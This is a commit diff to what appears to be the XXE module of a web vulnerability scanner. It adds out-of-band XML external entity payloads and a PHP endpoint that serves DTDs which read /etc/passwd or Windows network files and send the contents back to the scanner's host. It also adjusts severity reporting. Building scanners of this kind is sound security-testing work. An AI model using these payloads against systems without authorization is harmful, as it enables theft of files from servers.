Improve XXE attack module: add two payloads not using PHP filters (tested against PenTesterLab XXE VM) + generate medium level vulnerability if the DTD was reached but no data was received.
This commit is contained in:
parent
3b5f07c0e2
commit
2b80c2717e
|
@ -38,6 +38,12 @@ if (strlen($session_id) ==6 && ctype_alnum($session_id))
|
|||
case 2:
|
||||
$payload = "windows";
|
||||
break;
|
||||
case 3:
|
||||
$payload = "javalin";
|
||||
break;
|
||||
case 4:
|
||||
$payload = "javawin";
|
||||
break;
|
||||
default:
|
||||
$payload = "unknown";
|
||||
}
|
||||
|
|
|
@ -14,26 +14,48 @@ if (!ctype_xdigit($hex_param)) exit();
|
|||
|
||||
include("functions.php");
|
||||
|
||||
$num = -1;
|
||||
$payload_num = -1;
|
||||
// We must use small files because big one won't be sent
|
||||
switch($payload) {
|
||||
case "windows":
|
||||
$filename = "c:/windows/system32/drivers/etc/networks";
|
||||
$num = 2;
|
||||
$payload_num = 2;
|
||||
break;
|
||||
case "linux":
|
||||
$filename = "/etc/passwd";
|
||||
$num = 1;
|
||||
$payload_num = 1;
|
||||
break;
|
||||
case "linux2":
|
||||
$filename = "/etc/networks";
|
||||
$num = 0;
|
||||
$payload_num = 0;
|
||||
break;
|
||||
case "javalin":
|
||||
$filename = "/etc/passwd";
|
||||
$payload_num = 3;
|
||||
break;
|
||||
case "javawin":
|
||||
$filename = "c:/windows/system32/drivers/etc/networks";
|
||||
$payload_num = 4;
|
||||
break;
|
||||
}
|
||||
|
||||
$time = time();
|
||||
$directory = "./xxe_data/$session_id/$path_id/$hex_param/";
|
||||
if (!is_dir($directory)) mkdir($directory, 0777, true);
|
||||
|
||||
// Create an empty file so we can know if the DTD was queried
|
||||
touch("$directory/$time-$payload_num-$ip.txt");
|
||||
|
||||
if (substr($payload, 0, 4) === "java") {
|
||||
$response = '<!ENTITY % payload SYSTEM "file://'.$filename.'">
|
||||
<!ENTITY % intern "<!ENTITY trick SYSTEM \''.site_url().'xoxo/'.$session_id.'/'.$path_id.'/'.$hex_param.'/'.$payload_num.'/%payload;\'>">
|
||||
%intern;';
|
||||
} else {
|
||||
$response = '<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource='.$filename.'">
|
||||
<!ENTITY % intern "<!ENTITY % trick SYSTEM \''.site_url().'xoxo/'.$session_id.'/'.$path_id.'/'.$hex_param.'/'.$num.'/%payload;\'>">
|
||||
<!ENTITY % intern "<!ENTITY % trick SYSTEM \''.site_url().'xoxo/'.$session_id.'/'.$path_id.'/'.$hex_param.'/'.$payload_num.'/%payload;\'>">
|
||||
';
|
||||
}
|
||||
|
||||
header("Content-Type: text/xml");
|
||||
echo $response;
|
||||
?>
|
||||
|
|
|
@ -15,10 +15,15 @@ if (!ctype_digit($path_id)) exit();
|
|||
if (!ctype_xdigit($hex_param)) exit();
|
||||
if (!ctype_digit($payload_num)) exit();
|
||||
if (!strlen($data)) exit();
|
||||
$data = base64_decode($data);
|
||||
|
||||
if ($payload_num < 3) {
|
||||
// those are PHP payloads using a filter to encode the data in base64
|
||||
$data = base64_decode($data);
|
||||
}
|
||||
|
||||
|
||||
$time = time();
|
||||
$directory = "./xxe_data/$session_id/$path_id/$hex_param/";
|
||||
mkdir($directory, 0777, true);
|
||||
if (!is_dir($directory)) mkdir($directory, 0777, true);
|
||||
file_put_contents("$directory/$time-$payload_num-$ip.txt", $data, FILE_APPEND);
|
||||
?>
|
||||
|
|
|
@ -362,17 +362,24 @@ class ModuleXxe(Attack):
|
|||
parameter
|
||||
)
|
||||
|
||||
more_infos = _(
|
||||
"The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n"
|
||||
"Received data can be seen at {3}."
|
||||
).format(
|
||||
request_size,
|
||||
request_date,
|
||||
request_ip,
|
||||
request_url
|
||||
)
|
||||
if not request_size:
|
||||
# Overwrite the message as the full exploit chain failed
|
||||
vuln_message = _(
|
||||
"The target reached the DTD file on the endpoint but the exploitation didn't succeed."
|
||||
)
|
||||
else:
|
||||
# Exploitation succeed, we have some data
|
||||
more_infos = _(
|
||||
"The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n"
|
||||
"Received data can be seen at {3}."
|
||||
).format(
|
||||
request_size,
|
||||
request_date,
|
||||
request_ip,
|
||||
request_url
|
||||
)
|
||||
|
||||
vuln_message += "\n" + more_infos
|
||||
vuln_message += "\n" + more_infos
|
||||
|
||||
# placeholder if shit happens
|
||||
payload = (
|
||||
|
@ -417,7 +424,14 @@ class ModuleXxe(Attack):
|
|||
)
|
||||
mutated_request, __, __, __ = next(mutator.mutate(original_request))
|
||||
|
||||
await self.add_vuln_high(
|
||||
if request_size:
|
||||
add_vuln_method = self.add_vuln_high
|
||||
log_method = log_red
|
||||
else:
|
||||
add_vuln_method = self.add_vuln_medium
|
||||
log_method = log_orange
|
||||
|
||||
await add_vuln_method(
|
||||
request_id=original_request.path_id,
|
||||
category=NAME,
|
||||
request=mutated_request,
|
||||
|
@ -426,8 +440,8 @@ class ModuleXxe(Attack):
|
|||
wstg=WSTG_CODE
|
||||
)
|
||||
|
||||
log_red("---")
|
||||
log_red(vuln_message)
|
||||
log_red(Messages.MSG_EVIL_REQUEST)
|
||||
log_red(mutated_request.http_repr())
|
||||
log_red("---")
|
||||
log_method("---")
|
||||
log_method(vuln_message)
|
||||
log_method(Messages.MSG_EVIL_REQUEST)
|
||||
log_method(mutated_request.http_repr())
|
||||
log_method("---")
|
||||
|
|
|
@ -15,6 +15,15 @@ rules = link-local
|
|||
payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/system32/drivers/etc/networks">]><foo>&xxe;</foo>
|
||||
rules = network name/network number mappings
|
||||
|
||||
[out_of_band_linux_no_php]
|
||||
payload = <?xml version="1.0"?><!DOCTYPE foo SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/javalin.dtd"><foo>&trick;</foo>
|
||||
rules = root:x:0:
|
||||
root:*:0:0
|
||||
|
||||
[out_of_band_windows_no_php]
|
||||
payload = <?xml version="1.0"?><!DOCTYPE foo SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/javawin.dtd"><foo>&trick;</foo>
|
||||
rules = network name/network number mappings
|
||||
|
||||
[out_of_band_linux_passwd]
|
||||
payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/linux.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
|
||||
rules = root:x:0:
|
||||
|
|
Loading…
Reference in New Issue